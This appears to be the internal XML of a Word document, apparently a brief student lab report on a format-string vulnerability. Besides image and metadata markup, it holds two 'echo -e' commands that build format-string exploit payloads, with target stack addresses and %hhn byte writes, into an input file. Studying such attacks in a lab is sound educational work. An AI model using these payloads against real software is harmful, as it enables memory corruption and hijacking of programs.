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37248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9278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07465"/>
            <wp:effectExtent l="0" t="0" r="146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0177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echo -e "\xb7\xec\xff\xbf@@@@\xb5\xec\xff\xbf@@@@\xb6\xec\xff\xbf@@@@\xb4\xec\xff\xbf%.8x%.8x%.8x%.8x%.42x%hhn%.17x%hhn%.17x%hhn%.17x%hhn" &gt; input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="55575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echo -e "\xb6\xec\xff\xbf@@@@\xb5\xec\xff\xbf@@@@\xb7\xec\xff\xbf@@@@\xb4\xec\xff\xbf%.8x%.8x%.8x%.8x%.113x%hhn%.17x%hhn%.32x%hhn%.17x%hhn" &gt; input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="51130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4785" cy="303085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12026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21865"/>
            <wp:effectExtent l="0" t="0" r="146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IzMWViYmFiNjg0Zjc1NzIxNjgxMGIxZWQ5MTAzZTYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="72DE6082"/>
    <w:rsid w:val="0563090D"/>
    <w:rsid w:val="1D152C33"/>
    <w:rsid w:val="1E255A5D"/>
    <w:rsid w:val="29900537"/>
    <w:rsid w:val="72DE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13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</Words>
  <Characters>285</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>9</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>295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2023-06-20T01:48:00Z</dcterms:created>
  <dc:creator>国宝小可爱</dc:creator>
  <cp:lastModifiedBy>国宝小可爱</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-20T01:57:51Z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B6945376F0B54A01A44A4A8C38FDD8BE_11</vt:lpwstr>
  </property>
</Properties>
</file>